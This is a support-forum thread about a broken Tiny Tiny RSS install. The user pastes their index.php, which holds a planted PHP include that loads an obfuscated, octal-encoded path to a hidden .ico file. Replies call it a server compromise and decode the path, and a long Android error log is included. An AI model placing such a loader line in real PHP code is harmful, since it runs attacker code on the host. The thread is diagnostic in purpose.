Root Index.php file

Tiny Tiny RSS Support
1
  • [ X] I’m using stock docker compose setup, unmodified.
  • [ ] I’m using docker compose setup, with modifications (modified .yml files, third party plugins/themes, etc.) - if so, describe your modifications in your post. Before reporting, see if your issue can be reproduced on the unmodified setup.
  • [ ] I’m not using docker on my primary instance, but my issue can be reproduced on the aforementioned docker setup and/or official demo.

My installation was working fine until 11/19/2022. When I tried to open the website I get a blank page using my laptop. Using the Android app I get this message: Error: unknown error (see log). NOT a JSON Object: null
Yesterday when I checked the contents of the root Index.php file it was empty. Today it has this

<?php /*a63ae*/ @include ("\057ho\155e3\057te\170bi\153er\057pu\142li\143_h\164ml\0573m\141il\141t.\143om\057wp\055in\143lu\144es\057im\141ge\163/c\162ys\164al\057.5\064ec\062e3\071.i\143o"); /*a63ae*/ ?>

see above.

  • Tiny Tiny RSS version (including git commit id):
    Since I cannot open the website I can’t give the version

  • Platform (i.e. Linux distro, Docker, PHP, PostgreSQL, etc) versions:
    PHP on a Linux server at my domain host

Error log
11-20 17:17:59.975 28208 28208 D setupWidgetUpdates: interval= 900000
11-20 17:17:57.106 28208 28225 D OpenGLRenderer: endAllActiveAnimators on 0x7499233500 (RippleDrawable) with handle 0x73a92252b0
11-20 17:17:56.567 28208 28208 D setupWidgetUpdates: interval= 900000
11-20 17:17:56.566 28208 28208 D PreferencesActivity: setting theme to: THEME_FOLLOW_DEVICE
11-20 17:17:48.020 28208 28238 W System.err: at java.lang.Thread.run(Thread.java:1012)
11-20 17:17:48.020 28208 28238 W System.err: at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:637)
11-20 17:17:48.020 28208 28238 W System.err: at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1137)
11-20 17:17:48.020 28208 28238 W System.err: at java.util.concurrent.FutureTask.run(FutureTask.java:264)
11-20 17:17:48.020 28208 28238 W System.err: at android.os.AsyncTask$3.call(AsyncTask.java:394)
11-20 17:17:48.020 28208 28238 W System.err: at org.fox.ttrss.ApiRequest.doInBackground(ApiRequest.java:13)
11-20 17:17:48.020 28208 28238 W System.err: at org.fox.ttrss.ApiRequest.doInBackground(ApiRequest.java:42)
11-20 17:17:48.020 28208 28238 W System.err: at org.fox.ttrss.ApiCommon.performRequest(ApiCommon.java:148)
11-20 17:17:48.020 28208 28238 W System.err: at com.google.gson.JsonElement.getAsJsonObject(JsonElement.java:91)
11-20 17:17:48.020 28208 28238 W System.err: java.lang.IllegalStateException: Not a JSON Object: null
11-20 17:17:47.841 28208 28238 D TrafficStats: tagSocket(77) with statsTag=0xffffffff, statsUid=-1
11-20 17:17:45.196 28208 28238 W System.err: at java.lang.Thread.run(Thread.java:1012)
11-20 17:17:45.196 28208 28238 W System.err: at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:637)
11-20 17:17:45.196 28208 28238 W System.err: at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1137)
11-20 17:17:45.196 28208 28238 W System.err: at java.util.concurrent.FutureTask.run(FutureTask.java:264)
11-20 17:17:45.196 28208 28238 W System.err: at android.os.AsyncTask$3.call(AsyncTask.java:394)
11-20 17:17:45.196 28208 28238 W System.err: at org.fox.ttrss.ApiRequest.doInBackground(ApiRequest.java:13)
11-20 17:17:45.196 28208 28238 W System.err: at org.fox.ttrss.ApiRequest.doInBackground(ApiRequest.java:42)
11-20 17:17:45.196 28208 28238 W System.err: at org.fox.ttrss.ApiCommon.performRequest(ApiCommon.java:148)
11-20 17:17:45.196 28208 28238 W System.err: at com.google.gson.JsonElement.getAsJsonObject(JsonElement.java:91)
11-20 17:17:45.196 28208 28238 W System.err: java.lang.IllegalStateException: Not a JSON Object: null
11-20 17:17:45.062 28208 28238 D TrafficStats: tagSocket(5) with statsTag=0xffffffff, statsUid=-1
11-20 17:17:45.057 28208 28208 D CompatibilityChangeReporter: Compat change id reported: 78294732; UID 10271; state: DISABLED
11-20 17:17:08.856 28208 28208 D PreferencesActivity: onSharedPreferenceChanged:transport_debugging
11-20 17:17:08.856 28208 28208 D OnlineActivity: onSharedPreferenceChanged:transport_debugging
11-20 17:17:08.856 28208 28208 D LogcatActivity: onSharedPreferenceChanged:transport_debugging
11-20 17:17:08.856 28208 28208 D PreferencesActivity: onSharedPreferenceChanged:transport_debugging
11-20 17:17:07.647 28208 28208 D PreferencesActivity: onSharedPreferenceChanged:transport_debugging
11-20 17:17:07.647 28208 28208 D OnlineActivity: onSharedPreferenceChanged:transport_debugging
11-20 17:17:07.647 28208 28208 D LogcatActivity: onSharedPreferenceChanged:transport_debugging
11-20 17:17:07.647 28208 28208 D PreferencesActivity: onSharedPreferenceChanged:transport_debugging
11-20 17:17:04.234 28208 28225 D OpenGLRenderer: endAllActiveAnimators on 0x74992bdb80 (RippleDrawable) with handle 0x73a9249d60
11-20 17:17:03.671 28208 28208 D setupWidgetUpdates: interval= 900000
11-20 17:17:03.669 28208 28208 D PreferencesActivity: setting theme to: THEME_FOLLOW_DEVICE
11-20 17:17:03.625 28208 28208 I ActivityThread: Schedule relaunch activity: org.fox.ttrss.PreferencesActivity
11-20 17:16:50.004 28208 28208 D PreferencesActivity: onTrimMemory called
11-20 17:16:50.004 28208 28208 D LogcatActivity: onTrimMemory called
11-20 17:16:50.001 28208 28208 D OnlineActivity: onTrimMemory called
11-20 17:16:04.568 28208 28216 W org.fox.ttrss: Cleared Reference was only reachable from finalizer (only reported once)
11-20 17:15:46.933 28208 28225 D OpenGLRenderer: endAllActiveAnimators on 0x74992456b0 (ListView) with handle 0x73a9251aa0
11-20 17:15:46.450 28208 28208 D setupWidgetUpdates: interval= 900000
11-20 17:15:46.356 28208 28208 D setupWidgetUpdates: interval= 900000
11-20 17:15:46.355 28208 28208 I ActivityThread: Schedule relaunch activity: org.fox.ttrss.LogcatActivity
11-20 17:15:40.864 28208 28225 D OpenGLRenderer: endAllActiveAnimators on 0x7499233500 (RippleDrawable) with handle 0x73a92472d0
11-20 17:15:40.326 28208 28208 D CompatibilityChangeReporter: Compat change id reported: 171228096; UID 10271; state: ENABLED
11-20 17:15:40.311 28208 28208 D setupWidgetUpdates: interval= 900000
11-20 17:15:40.308 28208 28208 D PreferencesActivity: setting theme to: THEME_FOLLOW_DEVICE
11-20 17:15:35.081 28208 28238 W System.err: at java.lang.Thread.run(Thread.java:1012)
11-20 17:15:35.081 28208 28238 W System.err: at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:637)
11-20 17:15:35.081 28208 28238 W System.err: at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1137)
11-20 17:15:35.081 28208 28238 W System.err: at java.util.concurrent.FutureTask.run(FutureTask.java:264)
11-20 17:15:35.081 28208 28238 W System.err: at android.os.AsyncTask$3.call(AsyncTask.java:394)
11-20 17:15:35.081 28208 28238 W System.err: at org.fox.ttrss.ApiRequest.doInBackground(ApiRequest.java:13)
11-20 17:15:35.081 28208 28238 W System.err: at org.fox.ttrss.ApiRequest.doInBackground(ApiRequest.java:42)
11-20 17:15:35.081 28208 28238 W System.err: at org.fox.ttrss.ApiCommon.performRequest(ApiCommon.java:148)
11-20 17:15:35.081 28208 28238 W System.err: at com.google.gson.JsonElement.getAsJsonObject(JsonElement.java:91)
11-20 17:15:35.081 28208 28238 W System.err: java.lang.IllegalStateException: Not a JSON Object: null
11-20 17:15:35.051 28208 28208 D OnlineActivity: license apk found
11-20 17:15:34.988 28208 28238 D TrafficStats: tagSocket(78) with statsTag=0xffffffff, statsUid=-1
11-20 17:15:34.978 28208 28208 D OnlineActivity: intent action=null
11-20 17:15:34.975 28208 28208 D OnlineActivity: m_isOffline=false
11-20 17:15:34.959 28208 28208 D CompatibilityChangeReporter: Compat change id reported: 160794467; UID 10271; state: DISABLED
11-20 17:15:34.959 28208 28208 D setupWidgetUpdates: interval= 900000
11-20 17:15:34.957 28208 28208 D OnlineActivity: setting theme to: THEME_FOLLOW_DEVICE
11-20 17:15:34.949 28208 28208 D CompatibilityChangeReporter: Compat change id reported: 37756858; UID 10271; state: ENABLED
11-20 17:15:34.949 28208 28208 D CompatibilityChangeReporter: Compat change id reported: 210923482; UID 10271; state: DISABLED
11-20 17:15:34.932 28208 28208 D NetworkSecurityConfig: Using Network Security Config from resource network_security_config debugBuild: false
11-20 17:15:34.932 28208 28208 D NetworkSecurityConfig: Using Network Security Config from resource network_security_config debugBuild: false
11-20 17:15:34.930 28208 28208 V GraphicsEnvironment: Neither updatable production driver nor prerelease driver is supported.
11-20 17:15:34.930 28208 28208 V GraphicsEnvironment: ANGLE GameManagerService for org.fox.ttrss: false
11-20 17:15:34.929 28208 28208 V GraphicsEnvironment: ANGLE Developer option for ‘org.fox.ttrss’ set to: ‘default’
11-20 17:15:34.914 28208 28208 D ApplicationLoaders: Returning zygote-cached class loader: /system/framework/android.test.base.jar
11-20 17:15:34.910 28208 28208 D CompatibilityChangeReporter: Compat change id reported: 171979766; UID 10271; state: DISABLED
11-20 17:15:34.899 28208 28208 E org.fox.ttrss: Not starting debugger since process cannot load the jdwp agent.
11-20 17:15:34.890 28208 28208 I libc : SetHeapTaggingLevel: tag level set to 0
11-20 17:15:07.936 32108 32108 D OnlineActivity: onTrimMemory called
11-20 17:15:05.192 32108 32140 W System.err: at java.lang.Thread.run(Thread.java:1012)
11-20 17:15:05.192 32108 32140 W System.err: at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:637)
11-20 17:15:05.192 32108 32140 W System.err: at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1137)
11-20 17:15:05.192 32108 32140 W System.err: at java.util.concurrent.FutureTask.run(FutureTask.java:264)
11-20 17:15:05.192 32108 32140 W System.err: at android.os.AsyncTask$3.call(AsyncTask.java:394)
11-20 17:15:05.192 32108 32140 W System.err: at org.fox.ttrss.ApiRequest.doInBackground(ApiRequest.java:13)
11-20 17:15:05.192 32108 32140 W System.err: at org.fox.ttrss.ApiRequest.doInBackground(ApiRequest.java:42)
11-20 17:15:05.192 32108 32140 W System.err: at org.fox.ttrss.ApiCommon.performRequest(ApiCommon.java:148)
11-20 17:15:05.192 32108 32140 W System.err: at com.google.gson.JsonElement.getAsJsonObject(JsonElement.java:91)
11-20 17:15:05.192 32108 32140 W System.err: java.lang.IllegalStateException: Not a JSON Object: null
11-20 17:15:05.086 32108 32140 D TrafficStats: tagSocket(5) with statsTag=0xffffffff, statsUid=-1
11-20 17:15:05.070 32108 28154 D WidgetUpdateService: no widgets to work on, bailing out
11-20 17:15:05.070 32108 28154 D WidgetUpdateService: onHandleWork: Intent { }
11-20 17:15:05.070 32108 28154 D WidgetUpdateService: no widgets to work on, bailing out
11-20 17:15:05.070 32108 28154 D WidgetUpdateService: onHandleWork: Intent { }
11-20 17:15:05.069 32108 28154 D WidgetUpdateService: no widgets to work on, bailing out
11-20 17:15:05.069 32108 28154 D WidgetUpdateService: onHandleWork: Intent { }
--------- beginning of main

2

Nothing from tt-rss has that content. You should look into whether your server has been compromised.

3

Yup, almost certainly your server/host has been compromised - there’s no other reason to obfuscate what is there like this. FWIW that string decodes to:

"/home3/texbiker/public_html/3mailat.com/wp-includes/images/crystal/.54ec2e39.ico"

so I suspect the bulk of the compromise is in that file.

4

What should the root Index.php file coding be?

5

i don’t see how “yet another incompetent got his wordpress inevitably haxx0red” is related to tt-rss in any shape or form so i’m going to close this.